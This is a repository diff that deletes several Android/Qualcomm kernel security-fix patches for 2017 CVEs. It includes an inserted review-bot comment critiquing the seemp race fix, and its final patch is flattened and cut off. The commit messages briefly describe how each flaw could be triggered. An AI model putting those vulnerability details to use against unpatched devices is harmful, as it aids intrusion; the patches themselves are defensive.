-From: Conner Huff
-Date: Thu, 12 Jan 2017 22:09:16 -0700
-Subject: net: rmnet_data: Fix incorrect netlink handling
-
-rmnet_data netlink handler currently does not check for the
-incoming process pid and instead just loops back the pid.
-A malicious root user could potentially send a message with
-source pid 0 and this could cause rmnet_data to loop the message
-back till an out of memory situation occurs.
-
-rmnet_data also does not check for the message length of the
-incoming netlink messages and instead casts the netlink message
-without checking for the boundary.
-
-Fix these two scenarios by adding the pid and message length checks
-respectively.
-
-Bug: 31252965
-CRs-Fixed: 1098801
-Change-Id: I172c1a7112e67e82959b397af7ddfd963d819bdc
-Signed-off-by: Conner Huff
----
- net/rmnet_data/rmnet_data_config.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/net/rmnet_data/rmnet_data_config.c b/net/rmnet_data/rmnet_data_config.c
-index ebce455..fb4c60f 100644
---- a/net/rmnet_data/rmnet_data_config.c
-+++ b/net/rmnet_data/rmnet_data_config.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -540,6 +540,11 @@ void rmnet_config_netlink_msg_handler(struct sk_buff *skb)
- nlmsg_header = (struct nlmsghdr *) skb->data;
- rmnet_header = (struct rmnet_nl_msg_s *) nlmsg_data(nlmsg_header);
-
-+ if (!nlmsg_header->nlmsg_pid ||
-+ (nlmsg_header->nlmsg_len < sizeof(struct nlmsghdr) +
-+ sizeof(struct rmnet_nl_msg_s)))
-+ return;
-+
- LOGL("Netlink message pid=%d, seq=%d, length=%d, rmnet_type=%d",
- nlmsg_header->nlmsg_pid,
- nlmsg_header->nlmsg_seq,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0461/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0461/qcacld-2.0/0001.patch
deleted file mode 100644
index 7c84dc2c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0461/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From ce5d6f84420a2e6ca6aad6b866992970dd313a65 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda
-Date: Mon, 12 Dec 2016 18:45:32 -0800
-Subject: qcacld-2.0: Fix array out-of-bounds & integer underflow in
- _iw_set_genie
-
-'wrqu->data.length' holds the total number of IE data buffer.
-Add a check to make sure the number of remaining data to be read is
-greater than or equal to IE length.
-
-Also, advance the buffer pointer to point to the next element only
-if next element is present.
-
-Change-Id: Ic60f3e0650f365955dab4099eb8740e9789e00cc
-CRs-Fixed: 1100132
----
- CORE/HDD/src/wlan_hdd_wext.c | 12 +++++++++++-
- 1 file changed, 11 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 0549c3c..574b1ef 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -2755,6 +2755,13 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
- hddLog(VOS_TRACE_LEVEL_INFO, "%s: IE[0x%X], LEN[%d]",
- __func__, elementId, eLen);
-
-+ if (remLen < eLen) {
-+ hddLog(LOGE, "Remaining len: %u less than ie len: %u",
-+ remLen, eLen);
-+ ret = -EINVAL;
-+ goto exit;
-+ }
-+
- switch ( elementId )
- {
- case IE_EID_VENDOR:
-@@ -2837,8 +2844,11 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
- hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, elementId);
- goto exit;
- }
-- genie += eLen;
- remLen -= eLen;
-+
-+ /* Move genie only if next element is present */
-+ if (remLen >= 2)
-+ genie += eLen;
- }
- exit:
- EXIT();
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0462/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0462/3.18/0001.patch
deleted file mode 100644
index af26ac15..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0462/3.18/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From eb7b1426279e751b1fc3e86f434dc349945c1ae7 Mon Sep 17 00:00:00 2001
-From: ahmedsh
-Date: Wed, 4 Jan 2017 16:00:27 -0500
-Subject: seemp: use local stack mem when encoding params
-
-Avoid race condition in driver when encoding param by
-reading contents from a local copy instead of msg buffer
-itself which can be mapped to user space.
-
-Change-Id: I9f111c078baefca6e6f1fcda30af1044891a3356
-Signed-off-by: Ahmed Sheikh
----
- .../platform/msm/seemp_core/seemp_event_encoder.c | 21 ++++++++++++++++-----
- 1 file changed, 16 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/platform/msm/seemp_core/seemp_event_encoder.c b/drivers/platform/msm/seemp_core/seemp_event_encoder.c
-index df56a84..36901f5 100644
---- a/drivers/platform/msm/seemp_core/seemp_event_encoder.c
-+++ b/drivers/platform/msm/seemp_core/seemp_event_encoder.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2015, 2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -48,9 +48,15 @@ static void check_param_range(char *section_eq, bool param,
-
- void encode_seemp_params(struct seemp_logk_blk *blk)
- {
-- char *s = blk->payload.msg + 1;
-+ struct seemp_logk_blk tmp;
-+ char *s = 0;
-+ char *msg_section_start = 0;
-+ char *msg_section_eq = 0;
-+ char *msg_s = 0;
-
-- blk->payload.msg[BLK_MAX_MSG_SZ - 1] = 0; /* zero-terminate */
-+ memcpy(tmp.payload.msg, blk->payload.msg, BLK_MAX_MSG_SZ);
-+ s = tmp.payload.msg + 1;
-+ tmp.payload.msg[BLK_MAX_MSG_SZ - 1] = 0; /* zero-terminate */
-
- while (true) {
- char *section_start = s;
-@@ -105,8 +111,13 @@ void encode_seemp_params(struct seemp_logk_blk *blk)
- }
- }
-
-- encode_seemp_section(section_start, section_eq, s, param,
-- numeric, id, numeric_value);
-+ msg_section_start = blk->payload.msg + (section_start -
-+ tmp.payload.msg);
-+ msg_section_eq = blk->payload.msg + (section_eq -
-+ tmp.payload.msg);
-+ msg_s = blk->payload.msg + (s - tmp.payload.msg);
-+ encode_seemp_section(msg_section_start, msg_section_eq,
-+ msg_s, param, numeric, id, numeric_value);
-
- if (*s == 0)
- break;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0462/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0462/4.4/0002.patch
deleted file mode 100644
index aeb09e15..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0462/4.4/0002.patch
+++ /dev/null
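Review bot: encode_seemp_params() now parses a stack snapshot, but every call to `encode_seemp_section()` is still handed pointers into `blk->payload.msg`, the buffer the commit message says can be mapped to user space. If that helper reads any byte back from the ranges it is given (its body is not part of this patch), the race is only moved rather than closed; encoding inside `tmp.payload.msg` and publishing once after the loop with `memcpy(blk->payload.msg, tmp.payload.msg, BLK_MAX_MSG_SZ);` would keep every read on the private copy. `tmp` is declared as a whole `struct seemp_logk_blk` although only `payload.msg` is used in the visible lines, so `char tmp_msg[BLK_MAX_MSG_SZ];` would take less kernel stack. The 4.4 copy of the patch that follows is identical.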
@@ -1,63 +0,0 @@
-From 9a71e9a686942ae3c491061ab275a3678ee2819a Mon Sep 17 00:00:00 2001
-From: ahmedsh
-Date: Mon, 9 Jan 2017 17:24:09 -0500
-Subject: seemp: use local stack mem when encoding params
-
-Avoid race condition in driver when encoding param by
-reading contents from a local copy instead of msg buffer
-itself which can be mapped to user space.
-
-Change-Id: I405ca6c7fcb0afa112e0851907b5dca805ac5411
-Signed-off-by: Ahmed Sheikh
----
- .../platform/msm/seemp_core/seemp_event_encoder.c | 21 ++++++++++++++++-----
- 1 file changed, 16 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/platform/msm/seemp_core/seemp_event_encoder.c b/drivers/platform/msm/seemp_core/seemp_event_encoder.c
-index df56a84..36901f5 100644
---- a/drivers/platform/msm/seemp_core/seemp_event_encoder.c
-+++ b/drivers/platform/msm/seemp_core/seemp_event_encoder.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2015, 2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -48,9 +48,15 @@ static void check_param_range(char *section_eq, bool param,
-
- void encode_seemp_params(struct seemp_logk_blk *blk)
- {
-- char *s = blk->payload.msg + 1;
-+ struct seemp_logk_blk tmp;
-+ char *s = 0;
-+ char *msg_section_start = 0;
-+ char *msg_section_eq = 0;
-+ char *msg_s = 0;
-
-- blk->payload.msg[BLK_MAX_MSG_SZ - 1] = 0; /* zero-terminate */
-+ memcpy(tmp.payload.msg, blk->payload.msg, BLK_MAX_MSG_SZ);
-+ s = tmp.payload.msg + 1;
-+ tmp.payload.msg[BLK_MAX_MSG_SZ - 1] = 0; /* zero-terminate */
-
- while (true) {
- char *section_start = s;
-@@ -105,8 +111,13 @@ void encode_seemp_params(struct seemp_logk_blk *blk)
- }
- }
-
-- encode_seemp_section(section_start, section_eq, s, param,
-- numeric, id, numeric_value);
-+ msg_section_start = blk->payload.msg + (section_start -
-+ tmp.payload.msg);
-+ msg_section_eq = blk->payload.msg + (section_eq -
-+ tmp.payload.msg);
-+ msg_s = blk->payload.msg + (s - tmp.payload.msg);
-+ encode_seemp_section(msg_section_start, msg_section_eq,
-+ msg_s, param, numeric, id, numeric_value);
-
- if (*s == 0)
- break;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0463/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0463/3.18/0001.patch
deleted file mode 100644
index 4de1757c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0463/3.18/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 955bd7e7ac097bdffbadafab90e5378038fefeb2 Mon Sep 17 00:00:00 2001
-From: Karthikeyan Ramasubramanian
-Date: Thu, 15 Dec 2016 08:13:20 -0700
-Subject: net: ipc_router: Register services only on client port
-
-Allowing services to be registered on a non-client port will cause either
-an existing service or a control port to be over-written. This will cause
-undefined functional behavior.
-
-Allow the services to be registered only on client ports.
-
-CRs-Fixed: 1101792
-Change-Id: If6cfc75e9314204b7b44957f1598a8a2e1a45325
-Signed-off-by: Karthikeyan Ramasubramanian
----
- net/ipc_router/ipc_router_core.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/ipc_router/ipc_router_core.c b/net/ipc_router/ipc_router_core.c
-index ee4a873..9c784e8 100644
---- a/net/ipc_router/ipc_router_core.c
-+++ b/net/ipc_router/ipc_router_core.c
-@@ -2799,6 +2799,9 @@ int msm_ipc_router_register_server(struct msm_ipc_port *port_ptr,
- if (!port_ptr || !name)
- return -EINVAL;
-
-+ if (port_ptr->type != CLIENT_PORT)
-+ return -EINVAL;
-+
- if (name->addrtype != MSM_IPC_ADDR_NAME)
- return -EINVAL;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0463/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0463/4.4/0002.patch
deleted file mode 100644
index 03048d21..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0463/4.4/0002.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 32c229060ca33b816c50eedc136ea2800f9974df Mon Sep 17 00:00:00 2001
-From: Karthikeyan Ramasubramanian
-Date: Thu, 15 Dec 2016 08:13:20 -0700
-Subject: net: ipc_router: Register services only on client port
-
-Allowing services to be registered on a non-client port will cause either
-an existing service or a control port to be over-written. This will cause
-undefined functional behavior.
-
-Allow the services to be registered only on client ports.
-
-CRs-Fixed: 1101792
-Change-Id: If6cfc75e9314204b7b44957f1598a8a2e1a45325
-Signed-off-by: Karthikeyan Ramasubramanian
----
- net/ipc_router/ipc_router_core.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/ipc_router/ipc_router_core.c b/net/ipc_router/ipc_router_core.c
-index 008d034f..d23799a 100644
---- a/net/ipc_router/ipc_router_core.c
-+++ b/net/ipc_router/ipc_router_core.c
-@@ -2809,6 +2809,9 @@ int msm_ipc_router_register_server(struct msm_ipc_port *port_ptr,
- if (!port_ptr || !name)
- return -EINVAL;
-
-+ if (port_ptr->type != CLIENT_PORT)
-+ return -EINVAL;
-+
- if (name->addrtype != MSM_IPC_ADDR_NAME)
- return -EINVAL;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0464/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0464/qcacld-2.0/0001.patch
deleted file mode 100644
index f3f224eb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0464/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,1101 +0,0 @@ -From 051597a4fe19fd1292fb7ea2e627d12d1fd2934f Mon Sep 17 00:00:00 2001 -From: Srinivas Girigowda -Date: Fri, 16 Dec 2016 18:32:10 -0800 -Subject: qcacld-2.0: Remove obsolete set/reset ssid hotlist - -Remove obsolete set/reset ssid hotlist. - -Change-Id: Ie6c4a9847f2daa9ba2aebd17f386d584201b86d6 -CRs-Fixed: 1102593 ---- - CORE/HDD/inc/wlan_hdd_cfg80211.h | 20 +- - CORE/HDD/src/wlan_hdd_cfg80211.c | 560 ------------------------------- - CORE/MAC/inc/sirApi.h | 33 -- - CORE/MAC/src/include/sirParams.h | 2 +- - CORE/SERVICES/WMA/wma.c | 219 ------------ - CORE/SME/inc/sme_Api.h | 4 - - CORE/SME/src/sme_common/sme_Api.c | 46 --- - CORE/SYS/legacy/src/utils/src/macTrace.c | 1 - - 8 files changed, 7 insertions(+), 878 deletions(-) - -diff --git a/CORE/HDD/inc/wlan_hdd_cfg80211.h b/CORE/HDD/inc/wlan_hdd_cfg80211.h -index 3e46b3e..9a943af 100644 ---- a/CORE/HDD/inc/wlan_hdd_cfg80211.h -+++ b/CORE/HDD/inc/wlan_hdd_cfg80211.h -@@ -219,10 +219,12 @@ enum qca_nl80211_vendor_subcmds { - /* Start Wifi Memory Dump */ - QCA_NL80211_VENDOR_SUBCMD_WIFI_LOGGER_MEMORY_DUMP = 63, - QCA_NL80211_VENDOR_SUBCMD_ROAM = 64, -- QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SSID_HOTLIST = 65, -- QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_RESET_SSID_HOTLIST = 66, -- QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_FOUND = 67, -- QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_LOST = 68, -+ -+ /* -+ * APIs corresponding to the sub commands 65-68 are deprecated. 
-+ * These sub commands are reserved and not supposed to be used -+ * for any other purpose -+ */ - QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_LIST = 69, - QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_PASSPOINT_LIST = 70, - QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_RESET_PASSPOINT_LIST = 71, -@@ -333,12 +335,6 @@ enum qca_nl80211_vendor_subcmds_index { - QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_PASSPOINT_NETWORK_FOUND_INDEX, - #endif /* FEATURE_WLAN_EXTSCAN */ - --#ifdef FEATURE_WLAN_EXTSCAN -- QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SSID_HOTLIST_INDEX, -- QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_RESET_SSID_HOTLIST_INDEX, -- QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_FOUND_INDEX, -- QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_LOST_INDEX, --#endif - /* OCB events */ - QCA_NL80211_VENDOR_SUBCMD_DCC_STATS_EVENT_INDEX, - #ifdef WLAN_FEATURE_MEMDUMP -@@ -802,10 +798,6 @@ enum qca_wlan_vendor_attr_extscan_results - /* Unsigned 32bit value; a EXTSCAN Capabilities attribute. */ - QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_CAPABILITIES_MAX_NUM_WHITELISTED_SSID, - -- /* EXTSCAN attributes for -- * QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_FOUND sub-command & -- * QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_LOST sub-command -- */ - /* Use attr QCA_WLAN_VENDOR_ATTR_EXTSCAN_NUM_RESULTS_AVAILABLE - * to indicate number of results. 
- */ -diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c -index 532ec5a..4e3e7d4 100644 ---- a/CORE/HDD/src/wlan_hdd_cfg80211.c -+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c -@@ -1223,14 +1223,6 @@ static const struct nl80211_vendor_cmd_info wlan_hdd_cfg80211_vendor_events[] = - .vendor_id = QCA_NL80211_VENDOR_ID, - .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_RESET_SIGNIFICANT_CHANGE - }, -- [QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_FOUND_INDEX] = { -- .vendor_id = QCA_NL80211_VENDOR_ID, -- .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_FOUND -- }, -- [QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_LOST_INDEX] = { -- .vendor_id = QCA_NL80211_VENDOR_ID, -- .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_LOST -- }, - #endif /* FEATURE_WLAN_EXTSCAN */ - - #ifdef WLAN_FEATURE_LINK_LAYER_STATS -@@ -1307,14 +1299,6 @@ static const struct nl80211_vendor_cmd_info wlan_hdd_cfg80211_vendor_events[] = - .vendor_id = QCA_NL80211_VENDOR_ID, - .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_PASSPOINT_NETWORK_FOUND - }, -- [QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SSID_HOTLIST_INDEX] = { -- .vendor_id = QCA_NL80211_VENDOR_ID, -- .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SSID_HOTLIST -- }, -- [QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_RESET_SSID_HOTLIST_INDEX] = { -- .vendor_id = QCA_NL80211_VENDOR_ID, -- .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_RESET_SSID_HOTLIST -- }, - [QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_AP_LOST_INDEX] = { - .vendor_id = QCA_NL80211_VENDOR_ID, - .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_AP_LOST -@@ -3033,253 +3017,6 @@ static int wlan_hdd_cfg80211_extscan_set_bssid_hotlist(struct wiphy *wiphy, - } - - --/* -- * define short names for the global vendor params -- * used by wlan_hdd_cfg80211_extscan_set_ssid_hotlist() -- */ --#define PARAM_MAX \ -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX --#define PARAM_REQUEST_ID \ -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID --#define 
PARAMS_LOST_SSID_SAMPLE_SIZE \ -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_HOTLIST_PARAMS_LOST_SSID_SAMPLE_SIZE --#define PARAMS_NUM_SSID \ -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_HOTLIST_PARAMS_NUM_SSID --#define THRESHOLD_PARAM \ -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM --#define PARAM_SSID \ -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_SSID --#define PARAM_BAND \ -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_BAND --#define PARAM_RSSI_LOW \ -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_RSSI_LOW --#define PARAM_RSSI_HIGH \ -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_RSSI_HIGH -- --/** -- * __wlan_hdd_cfg80211_extscan_set_ssid_hotlist() - set ssid hot list -- * @wiphy: Pointer to wireless phy -- * @wdev: Pointer to wireless device -- * @data: Pointer to data -- * @data_len: Data length -- * -- * Return: 0 on success, negative errno on failure -- */ --static int --__wlan_hdd_cfg80211_extscan_set_ssid_hotlist(struct wiphy *wiphy, -- struct wireless_dev *wdev, -- const void *data, -- int data_len) --{ -- struct sir_set_ssid_hotlist_request *request; -- struct net_device *dev = wdev->netdev; -- hdd_adapter_t *adapter = WLAN_HDD_GET_PRIV_PTR(dev); -- hdd_context_t *hdd_ctx = wiphy_priv(wiphy); -- struct nlattr *tb[PARAM_MAX + 1]; -- struct nlattr *tb2[PARAM_MAX + 1]; -- struct nlattr *ssids; -- struct hdd_ext_scan_context *context; -- uint32_t request_id; -- char ssid_string[SIR_MAC_MAX_SSID_LENGTH + 1]; -- int ssid_len, ssid_length; -- eHalStatus status; -- int i, rem, retval; -- unsigned long rc; -- -- ENTER(); -- -- if (VOS_FTM_MODE == hdd_get_conparam()) { -- hddLog(LOGE, FL("Command not allowed in FTM mode")); -- return -EINVAL; -- } -- -- retval = wlan_hdd_validate_context(hdd_ctx); -- if (0 != retval) -- return -EINVAL; -- -- if (nla_parse(tb, PARAM_MAX, -- data, data_len, -- wlan_hdd_extscan_config_policy)) { -- hddLog(LOGE, FL("Invalid ATTR")); -- return -EINVAL; -- } -- -- request = vos_mem_malloc(sizeof(*request)); -- if 
(!request) { -- hddLog(LOGE, FL("vos_mem_malloc failed")); -- return -ENOMEM; -- } -- -- /* Parse and fetch request Id */ -- if (!tb[PARAM_REQUEST_ID]) { -- hddLog(LOGE, FL("attr request id failed")); -- goto fail; -- } -- -- request->request_id = nla_get_u32(tb[PARAM_REQUEST_ID]); -- hddLog(LOG1, FL("Request Id %d"), request->request_id); -- -- /* Parse and fetch lost SSID sample size */ -- if (!tb[PARAMS_LOST_SSID_SAMPLE_SIZE]) { -- hddLog(LOGE, FL("attr number of Ssid failed")); -- goto fail; -- } -- request->lost_ssid_sample_size = -- nla_get_u32(tb[PARAMS_LOST_SSID_SAMPLE_SIZE]); -- hddLog(LOG1, FL("Lost SSID Sample Size %d"), -- request->lost_ssid_sample_size); -- -- /* Parse and fetch number of hotlist SSID */ -- if (!tb[PARAMS_NUM_SSID]) { -- hddLog(LOGE, FL("attr number of Ssid failed")); -- goto fail; -- } -- request->ssid_count = nla_get_u32(tb[PARAMS_NUM_SSID]); -- hddLog(LOG1, FL("Number of SSID %d"), request->ssid_count); -- -- request->session_id = adapter->sessionId; -- hddLog(LOG1, FL("Session Id (%d)"), request->session_id); -- -- i = 0; -- nla_for_each_nested(ssids, tb[THRESHOLD_PARAM], rem) { -- if (i >= WLAN_EXTSCAN_MAX_HOTLIST_SSIDS) { -- hddLog(LOGE, -- FL("Too Many SSIDs, %d exceeds %d"), -- i, WLAN_EXTSCAN_MAX_HOTLIST_SSIDS); -- break; -- } -- if (nla_parse(tb2, PARAM_MAX, -- nla_data(ssids), nla_len(ssids), -- wlan_hdd_extscan_config_policy)) { -- hddLog(LOGE, FL("nla_parse failed")); -- goto fail; -- } -- -- /* Parse and fetch SSID */ -- if (!tb2[PARAM_SSID]) { -- hddLog(LOGE, FL("attr ssid failed")); -- goto fail; -- } -- ssid_length = nla_strlcpy(ssid_string, -- tb2[PARAM_SSID], -- sizeof(ssid_string)); -- -- /* nla_parse will detect overflow but not underflow */ -- if (0 == ssid_length) { -- hddLog(LOGE, FL("zero ssid length")); -- goto fail; -- } -- hddLog(LOG1, FL("SSID %s"), ssid_string); -- ssid_len = strlen(ssid_string); -- if (ssid_length > SIR_MAC_MAX_SSID_LENGTH) { -- hddLog(LOGE, FL("Invalid ssid length")); -- goto fail; -- } 
-- memcpy(request->ssids[i].ssid.ssId, ssid_string, ssid_len); -- request->ssids[i].ssid.length = ssid_len; -- -- /* Parse and fetch low RSSI */ -- if (!tb2[PARAM_BAND]) { -- hddLog(LOGE, FL("attr band failed")); -- goto fail; -- } -- request->ssids[i].band = nla_get_u8(tb2[PARAM_BAND]); -- hddLog(LOG1, FL("band %d"), request->ssids[i].band); -- -- /* Parse and fetch low RSSI */ -- if (!tb2[PARAM_RSSI_LOW]) { -- hddLog(LOGE, FL("attr low RSSI failed")); -- goto fail; -- } -- request->ssids[i].rssi_low = nla_get_s32(tb2[PARAM_RSSI_LOW]); -- hddLog(LOG1, FL("RSSI low %d"), request->ssids[i].rssi_low); -- -- /* Parse and fetch high RSSI */ -- if (!tb2[PARAM_RSSI_HIGH]) { -- hddLog(LOGE, FL("attr high RSSI failed")); -- goto fail; -- } -- request->ssids[i].rssi_high = nla_get_u32(tb2[PARAM_RSSI_HIGH]); -- hddLog(LOG1, FL("RSSI high %d"), request->ssids[i].rssi_high); -- i++; -- } -- -- context = &hdd_ctx->ext_scan_context; -- spin_lock(&hdd_context_lock); -- INIT_COMPLETION(context->response_event); -- context->request_id = request_id = request->request_id; -- spin_unlock(&hdd_context_lock); -- -- status = sme_set_ssid_hotlist(hdd_ctx->hHal, request); -- if (!HAL_STATUS_SUCCESS(status)) { -- hddLog(LOGE, -- FL("sme_set_ssid_hotlist failed(err=%d)"), status); -- goto fail; -- } -- -- vos_mem_free(request); -- -- /* request was sent -- wait for the response */ -- rc = wait_for_completion_timeout(&context->response_event, -- msecs_to_jiffies -- (WLAN_WAIT_TIME_EXTSCAN)); -- if (!rc) { -- hddLog(LOGE, FL("sme_set_ssid_hotlist timed out")); -- retval = -ETIMEDOUT; -- } else { -- spin_lock(&hdd_context_lock); -- if (context->request_id == request_id) -- retval = context->response_status; -- else -- retval = -EINVAL; -- spin_unlock(&hdd_context_lock); -- } -- -- return retval; -- --fail: -- vos_mem_free(request); -- return -EINVAL; --} -- --/* -- * done with short names for the global vendor params -- * used by wlan_hdd_cfg80211_extscan_set_ssid_hotlist() -- */ --#undef 
PARAM_MAX --#undef PARAM_REQUEST_ID --#undef PARAMS_NUM_SSID --#undef THRESHOLD_PARAM --#undef PARAM_SSID --#undef PARAM_BAND --#undef PARAM_RSSI_LOW --#undef PARAM_RSSI_HIGH -- --/** -- * wlan_hdd_cfg80211_extscan_set_ssid_hotlist() - set ssid hot list -- * @wiphy: Pointer to wireless phy -- * @wdev: Pointer to wireless device -- * @data: Pointer to data -- * @data_len: Data length -- * -- * Return: 0 on success, negative errno on failure -- */ --static int --wlan_hdd_cfg80211_extscan_set_ssid_hotlist(struct wiphy *wiphy, -- struct wireless_dev *wdev, -- const void *data, -- int data_len) --{ -- int ret; -- -- vos_ssr_protect(__func__); -- ret = __wlan_hdd_cfg80211_extscan_set_ssid_hotlist(wiphy, wdev, data, -- data_len); -- vos_ssr_unprotect(__func__); -- -- return ret; --} -- - static int __wlan_hdd_cfg80211_extscan_set_significant_change( - struct wiphy *wiphy, - struct wireless_dev *wdev, -@@ -4632,136 +4369,6 @@ static int wlan_hdd_cfg80211_extscan_reset_bssid_hotlist(struct wiphy *wiphy, - return ret; - } - --/** -- * __wlan_hdd_cfg80211_extscan_reset_ssid_hotlist() - reset ssid hot list -- * @wiphy: Pointer to wireless phy -- * @wdev: Pointer to wireless device -- * @data: Pointer to data -- * @data_len: Data length -- * -- * Return: 0 on success, negative errno on failure -- */ --static int --__wlan_hdd_cfg80211_extscan_reset_ssid_hotlist(struct wiphy *wiphy, -- struct wireless_dev *wdev, -- const void *data, -- int data_len) --{ -- struct sir_set_ssid_hotlist_request *request; -- struct net_device *dev = wdev->netdev; -- hdd_adapter_t *adapter = WLAN_HDD_GET_PRIV_PTR(dev); -- hdd_context_t *hdd_ctx = wiphy_priv(wiphy); -- struct nlattr *tb[PARAM_MAX + 1]; -- struct hdd_ext_scan_context *context; -- uint32_t request_id; -- eHalStatus status; -- int retval; -- unsigned long rc; -- -- ENTER(); -- -- if (VOS_FTM_MODE == hdd_get_conparam()) { -- hddLog(LOGE, FL("Command not allowed in FTM mode")); -- return -EINVAL; -- } -- -- retval = 
wlan_hdd_validate_context(hdd_ctx); -- if (0 != retval) -- return -EINVAL; -- -- if (!hdd_ctx->cfg_ini->extscan_enabled) { -- hddLog(LOGE, FL("extscan not supported")); -- return -ENOTSUPP; -- } -- if (nla_parse(tb, PARAM_MAX, -- data, data_len, -- wlan_hdd_extscan_config_policy)) { -- hddLog(LOGE, FL("Invalid ATTR")); -- return -EINVAL; -- } -- -- request = vos_mem_malloc(sizeof(*request)); -- if (!request) { -- hddLog(LOGE, FL("vos_mem_malloc failed")); -- return -ENOMEM; -- } -- -- /* Parse and fetch request Id */ -- if (!tb[PARAM_REQUEST_ID]) { -- hddLog(LOGE, FL("attr request id failed")); -- goto fail; -- } -- -- request->request_id = nla_get_u32(tb[PARAM_REQUEST_ID]); -- request->session_id = adapter->sessionId; -- hddLog(LOG1, FL("Request Id %d Session Id %d"), request->request_id, -- request->session_id); -- -- request->lost_ssid_sample_size = 0; -- 